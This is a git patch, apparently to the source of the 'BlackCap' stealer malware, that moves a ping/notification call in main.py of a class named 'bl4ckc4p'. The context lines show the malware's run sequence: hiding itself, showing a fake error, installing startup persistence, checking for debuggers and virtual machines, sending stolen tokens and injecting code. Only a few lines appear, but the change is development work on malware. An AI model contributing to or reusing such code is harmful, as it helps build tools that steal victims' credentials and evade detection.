From 903a7232baf734a2796b4b90d6247dc6607b43f6 Mon Sep 17 00:00:00 2001 From: What about KSCH <54140748+KSCHdsc@users.noreply.github.com> Date: Thu, 19 Jan 2023 22:48:00 +0100 Subject: [PATCH] Update main.py --- main.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/main.py b/main.py index dd3fd3e..d1de631 100644 --- a/main.py +++ b/main.py @@ -462,7 +462,6 @@ class bl4ckc4p(Functions): self.hiding() self.fakeerror() - self.pingonrunning() self.startupblackcap() if self.fetch_conf('dbugkiller') and AntiDebug().inVM is True: @@ -513,6 +512,7 @@ class bl4ckc4p(Functions): continue self.ntfytkn() await self._1ject() + self.pingonrunning() self.ending()